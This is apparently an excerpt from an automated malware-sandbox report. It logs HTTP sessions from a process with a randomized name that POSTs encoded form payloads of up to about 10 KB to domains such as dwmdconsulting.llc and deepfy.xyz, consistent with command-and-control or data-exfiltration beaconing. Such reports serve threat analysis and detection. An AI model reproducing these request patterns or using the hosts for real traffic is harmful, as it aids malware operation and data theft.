Nov 4, 2024 10:12:51.582786083 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:12:51 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
Nov 4, 2024 10:12:51.582798958 CET	237	IN	Data Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83 Data Ascii: .com<PR></a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:56.792522907 CET	750	OUT	POST /kz8j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.dwmdconsulting.llc Origin: http://www.dwmdconsulting.llc Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.dwmdconsulting.llc/kz8j/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 64 69 69 4d 2f 56 53 4c 70 53 45 79 39 6b 6a 54 36 31 4a 68 53 57 36 68 44 42 6a 4c 4e 63 4b 75 58 6d 44 37 42 31 63 50 54 76 56 35 43 31 6a 4b 6a 2f 41 76 49 35 56 4f 64 30 70 66 32 2b 78 5a 70 38 55 32 48 78 59 64 68 4f 4c 38 4d 6d 45 79 6d 4f 35 35 70 75 51 62 4d 4e 35 6d 54 73 48 47 45 36 57 49 4f 42 35 67 4e 79 69 51 75 51 74 38 4e 2b 65 53 62 74 6c 57 56 47 4e 7a 36 75 59 41 77 4f 53 6b 76 7a 49 47 73 69 6d 37 4a 47 31 56 4d 6f 48 77 50 57 74 59 35 54 44 6a 77 58 58 6e 53 45 47 63 63 2b 2b 50 73 4b 57 2b 65 37 6d 34 64 5a 2f 55 4b 6a 4f 41 5a 2f 79 4b 4f 31 6f 4e 4d 77 3d 3d Data Ascii: Q8r=diiM/VSLpSEy9kjT61JhSW6hDBjLNcKuXmD7B1cPTvV5C1jKj/AvI5VOd0pf2+xZp8U2HxYdhOL8MmEymO55puQbMN5mTsHGE6WIOB5gNyiQuQt8N+eSbtlWVGNz6uYAwOSkvzIGsim7JG1VMoHwPWtY5TDjwXXnSEGcc++PsKW+e7m4dZ/UKjOAZ/yKO1oNMw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:59.346471071 CET	770	OUT	POST /kz8j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.dwmdconsulting.llc Origin: http://www.dwmdconsulting.llc Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.dwmdconsulting.llc/kz8j/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 64 69 69 4d 2f 56 53 4c 70 53 45 79 39 42 7a 54 37 53 56 68 44 6d 36 69 47 42 6a 4c 55 4d 4b 71 58 6d 50 37 42 30 70 53 55 61 6c 35 43 51 48 4b 67 2b 41 76 64 35 56 4f 46 6b 70 61 70 4f 78 53 70 38 70 4c 48 31 59 64 68 4f 66 38 4d 6e 30 79 6e 39 68 36 37 4f 51 64 46 74 35 34 58 73 48 47 45 36 57 49 4f 42 74 65 4e 79 36 51 75 67 39 38 4d 62 79 52 54 4e 6c 52 46 57 4e 7a 72 2b 5a 48 77 4f 53 6a 76 79 55 38 73 6b 71 37 4a 48 46 56 4d 39 37 7a 42 57 74 61 33 7a 43 4a 32 33 4b 46 53 78 50 4f 56 64 79 63 79 61 47 47 66 39 72 69 4d 6f 65 44 59 6a 71 7a 45 34 37 2b 44 32 56 45 58 31 68 79 69 44 69 62 6d 67 68 41 6d 31 6c 74 55 41 4d 64 76 69 77 3d Data Ascii: Q8r=diiM/VSLpSEy9BzT7SVhDm6iGBjLUMKqXmP7B0pSUal5CQHKg+Avd5VOFkpapOxSp8pLH1YdhOf8Mn0yn9h67OQdFt54XsHGE6WIOBteNy6Qug98MbyRTNlRFWNzr+ZHwOSjvyU8skq7JHFVM97zBWta3zCJ23KFSxPOVdycyaGGf9riMoeDYjqzE47+D2VEX1hyiDibmghAm1ltUAMdviw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:01.905317068 CET	10852	OUT	POST /kz8j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.dwmdconsulting.llc Origin: http://www.dwmdconsulting.llc Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.dwmdconsulting.llc/kz8j/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 64 69 69 4d 2f 56 53 4c 70 53 45 79 39 42 7a 54 37 53 56 68 44 6d 36 69 47 42 6a 4c 55 4d 4b 71 58 6d 50 37 42 30 70 53 55 62 78 35 43 6a 2f 4b 67 64 59 76 62 4a 56 4f 4e 45 70 62 70 4f 78 4c 70 34 39 50 48 31 63 33 68 4d 6e 38 4d 45 73 79 67 4d 68 36 78 4f 51 64 61 39 35 6c 54 73 47 63 45 2b 4b 4d 4f 42 39 65 4e 79 36 51 75 6d 78 38 4d 4f 65 52 56 4e 6c 57 56 47 4e 6e 36 75 5a 6a 77 50 36 56 76 78 35 4c 74 55 4b 37 4a 6e 56 56 4f 4c 76 7a 4a 57 74 55 6e 6a 43 52 32 33 47 7a 53 78 37 38 56 65 75 79 79 59 61 47 63 70 4f 37 59 59 50 61 46 41 50 6f 65 4c 6a 57 61 6e 68 57 55 45 78 4d 75 77 76 62 32 6c 42 35 68 48 73 7a 47 67 39 59 75 32 46 56 70 64 38 2b 68 79 6e 56 46 62 61 62 67 34 51 73 4a 37 50 30 5a 4f 5a 54 73 77 35 38 4a 4a 6a 37 4e 57 51 71 79 76 4d 50 6e 68 50 38 45 5a 59 31 58 67 30 2b 4c 71 4c 44 51 31 79 6e 78 64 66 41 6e 31 56 4c 51 6f 6e 72 4c 54 52 61 34 2b 54 6c 74 30 4f 6a 6e 38 4a 69 57 67 52 50 42 78 43 6e 45 71 4e 33 48 4f 5a 54 44 78 69 65 75 79 43 56 58 41 31 5a 64 68 [TRUNCATED] Data Ascii: Q8r=diiM/VSLpSEy9BzT7SVhDm6iGBjLUMKqXmP7B0pSUbx5Cj/KgdYvbJVONEpbpOxLp49PH1c3hMn8MEsygMh6xOQda95lTsGcE+KMOB9eNy6Qumx8MOeRVNlWVGNn6uZjwP6Vvx5LtUK7JnVVOLvzJWtUnjCR23GzSx78VeuyyYaGcpO7YYPaFAPoeLjWanhWUExMuwvb2lB5hHszGg9Yu2FVpd8+hynVFbabg4QsJ7P0ZOZTsw58JJj7NWQqyvMPnhP8EZY1Xg0+LqLDQ1ynxdfAn1VLQonrLTRa4+Tlt0Ojn8JiWgRPBxCnEqN3HOZTDxieuyCVXA1ZdhOHjgWE9uKX21WaYF67Z/Bcs1lnLafUU3y4MxCS021LFpIYLw1hOdi8fbh8O7yJNhr1TTE1WHFF7SeTcC7PZhNAm4v0Os5+SAM8gEr1QebdiXnIvQkWj0XDNz077q9jRdWG+HrR4Zn5cgHC+j8kOR56MqJbLySGRuTOLCu908pkJUArtwOkZVu4hxZmOrdkCzb69I/qKTFvZKVnkt0rWAUaIHPME2IELWwBVaJI4Yo68YdqTcEcDODBfVvlwDMD6kl7AUbEyQEiqYTwq9tOToxbzK1a6Msm9g5nI6fq1ceLrY5dI3wUDiHh0u4LDK64C9Us3MuKHlnki20ko2ShjJp8tAZjmzfR+YwrkGI3uu6aC8ILII0bRhHrfAs1LBXpIgXhHnhXxEONYI0M8x/+/uDsX2aBYPa9LE15j4OefNFTZAo4Yy+bSSA27876mnEmHfCThA6ZrYerY8wW2qaMnD6LG7NMKBQ6wlDNvvbYXrUcMF/P8+5qgUuyj74ZQFJ16zksUvsBrsR4PN0QItVEsrumjwS/WGqyK52NqOppfvDBQyRF90BdA1x7eUOLLqzLjBTnnjSAJKPZjwUIfHqaG/SXa6+OL9zQn1BRZpZJ5EqdYoOg/dKhqyDeiopuHibexaVBEbDNK5F9714WtHFMW2BGOx0jB1agciOF [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:04.536524057 CET	470	OUT	GET /kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.dwmdconsulting.llc Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:13:12.176579952 CET	392	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 04 Nov 2024 09:13:12 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 38 72 3d 51 67 4b 73 38 69 62 38 70 53 6b 57 2b 7a 4b 42 77 69 70 43 48 58 37 55 4d 55 71 4d 46 37 79 41 44 7a 58 54 44 47 4a 30 58 64 42 36 4f 43 48 51 72 61 4a 2b 4b 5a 55 33 44 78 68 4d 6f 75 52 74 67 2b 30 38 65 67 78 55 30 76 2f 4f 4c 6d 74 45 72 72 42 31 2b 39 6f 71 4c 66 4a 6b 62 34 72 62 63 4f 4b 30 4e 69 4d 72 47 53 4c 35 31 57 38 72 4d 72 43 38 64 73 77 3d 26 36 74 72 70 71 3d 61 6e 51 54 33 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50039	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:17.325706959 CET	726	OUT	POST /0zsv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.deepfy.xyz Origin: http://www.deepfy.xyz Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.deepfy.xyz/0zsv/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 7a 6d 51 49 70 78 5a 68 44 73 51 6f 71 37 46 38 43 67 37 33 36 35 45 58 4e 39 51 71 73 78 35 4a 56 2b 43 51 38 4d 42 52 49 48 2b 33 33 67 6b 6a 6c 61 38 37 6f 54 48 75 6a 35 45 74 30 55 31 51 56 6e 49 62 61 44 2f 61 4f 6c 7a 34 6b 77 36 61 76 33 2f 2b 63 6a 4c 48 4e 42 54 36 54 65 2f 55 74 36 50 2b 4e 66 67 53 71 78 70 6a 79 37 6f 2b 5a 58 4d 52 6a 56 51 45 55 41 44 67 6d 45 42 57 30 6a 62 51 31 67 73 57 39 38 65 52 51 4a 66 78 42 53 39 6f 6c 75 56 66 70 39 55 74 54 7a 6f 4e 45 75 31 47 34 32 47 2b 36 53 6b 4f 63 6f 47 58 61 54 66 47 44 44 61 62 63 6a 68 7a 45 70 57 68 59 77 3d 3d Data Ascii: Q8r=zmQIpxZhDsQoq7F8Cg7365EXN9Qqsx5JV+CQ8MBRIH+33gkjla87oTHuj5Et0U1QVnIbaD/aOlz4kw6av3/+cjLHNBT6Te/Ut6P+NfgSqxpjy7o+ZXMRjVQEUADgmEBW0jbQ1gsW98eRQJfxBS9oluVfp9UtTzoNEu1G42G+6SkOcoGXaTfGDDabcjhzEpWhYw==
Nov 4, 2024 10:13:17.958456993 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:13:17 GMT content-type: text/html; charset=utf-8 content-length: 1110 x-request-id: 2d3725b6-2b3b-4cef-ae9b-bc275411c3e6 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA== set-cookie: parking_session=2d3725b6-2b3b-4cef-ae9b-bc275411c3e6; expires=Mon, 04 Nov 2024 09:28:17 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 75 6b 33 32 4b 72 55 2f 57 6e 55 37 7a 79 48 62 77 57 41 51 30 51 4e 51 69 70 38 67 70 69 35 34 45 48 30 47 44 6c 59 74 38 68 52 6c 39 48 58 79 6e 62 71 6d 45 38 43 50 4d 71 6e 62 6b 4a 4e 6c 68 6e 66 68 70 6f 6f 79 46 45 35 4e 49 74 55 6c 38 43 70 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:13:17.958533049 CET	563	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmQzNzI1YjYtMmIzYi00Y2VmLWFlOWItYmMyNzU0MTFjM2U2IiwicGFnZV90aW1lIjoxNzMwNzExNT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50040	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:19.879949093 CET	746	OUT	POST /0zsv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.deepfy.xyz Origin: http://www.deepfy.xyz Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.deepfy.xyz/0zsv/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 7a 6d 51 49 70 78 5a 68 44 73 51 6f 71 62 31 38 41 41 48 33 72 4a 45 49 48 64 51 71 6d 52 35 46 56 2b 4f 51 38 4e 46 37 49 31 71 33 33 41 30 6a 6b 59 55 37 34 44 48 75 37 70 45 73 37 30 31 58 56 6e 45 70 61 48 2f 61 4f 6c 58 34 6b 78 4b 61 76 68 33 39 63 7a 4c 42 5a 78 54 34 64 2b 2f 55 74 36 50 2b 4e 66 30 34 71 78 52 6a 79 49 67 2b 66 43 34 57 2f 46 51 48 58 41 44 67 69 45 42 53 30 6a 61 48 31 6c 30 73 39 36 61 52 51 4d 62 78 42 44 39 72 79 65 56 6a 6e 64 56 45 65 47 77 43 4f 4d 35 47 36 6e 6d 75 39 79 63 69 51 4f 4c 4e 4c 69 2b 52 52 44 2b 6f 42 6b 6f 48 4a 71 72 6f 44 36 42 67 76 66 45 57 2f 46 36 39 30 4e 49 39 62 43 47 70 42 52 6b 3d Data Ascii: Q8r=zmQIpxZhDsQoqb18AAH3rJEIHdQqmR5FV+OQ8NF7I1q33A0jkYU74DHu7pEs701XVnEpaH/aOlX4kxKavh39czLBZxT4d+/Ut6P+Nf04qxRjyIg+fC4W/FQHXADgiEBS0jaH1l0s96aRQMbxBD9ryeVjndVEeGwCOM5G6nmu9yciQOLNLi+RRD+oBkoHJqroD6BgvfEW/F690NI9bCGpBRk=
Nov 4, 2024 10:13:20.518059015 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:13:19 GMT content-type: text/html; charset=utf-8 content-length: 1110 x-request-id: 76e203d0-e89d-45e9-a6c4-e79db1ba44fc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA== set-cookie: parking_session=76e203d0-e89d-45e9-a6c4-e79db1ba44fc; expires=Mon, 04 Nov 2024 09:28:20 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 75 6b 33 32 4b 72 55 2f 57 6e 55 37 7a 79 48 62 77 57 41 51 30 51 4e 51 69 70 38 67 70 69 35 34 45 48 30 47 44 6c 59 74 38 68 52 6c 39 48 58 79 6e 62 71 6d 45 38 43 50 4d 71 6e 62 6b 4a 4e 6c 68 6e 66 68 70 6f 6f 79 46 45 35 4e 49 74 55 6c 38 43 70 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:13:20.518219948 CET	563	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzZlMjAzZDAtZTg5ZC00NWU5LWE2YzQtZTc5ZGIxYmE0NGZjIiwicGFnZV90aW1lIjoxNzMwNzExNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50041	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:22.784719944 CET	10828	OUT	POST /0zsv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.deepfy.xyz Origin: http://www.deepfy.xyz Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.deepfy.xyz/0zsv/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 7a 6d 51 49 70 78 5a 68 44 73 51 6f 71 62 31 38 41 41 48 33 72 4a 45 49 48 64 51 71 6d 52 35 46 56 2b 4f 51 38 4e 46 37 49 31 53 33 33 53 4d 6a 6c 35 55 37 71 54 48 75 6c 35 45 68 37 30 30 4c 56 6e 73 58 61 48 37 4b 4f 6e 2f 34 6c 58 65 61 2f 44 66 39 58 7a 4c 42 62 78 54 39 54 65 2f 42 74 36 66 36 4e 66 6b 34 71 78 52 6a 79 4a 51 2b 4f 58 4d 57 76 31 51 45 55 41 44 73 6d 45 41 50 30 6a 53 58 31 6c 34 38 38 4b 36 52 52 73 72 78 48 78 56 72 75 4f 56 62 67 64 56 63 65 47 31 43 4f 4d 55 39 36 6e 53 45 39 78 41 69 54 59 58 51 65 68 2b 6e 4c 51 75 56 62 56 38 39 4b 6f 58 64 46 39 31 55 76 73 64 4c 6e 45 72 66 78 4f 67 32 4d 67 6e 72 51 57 2f 72 74 72 6b 44 67 44 37 4f 53 58 67 36 43 2f 31 53 41 38 44 4a 6e 33 4b 32 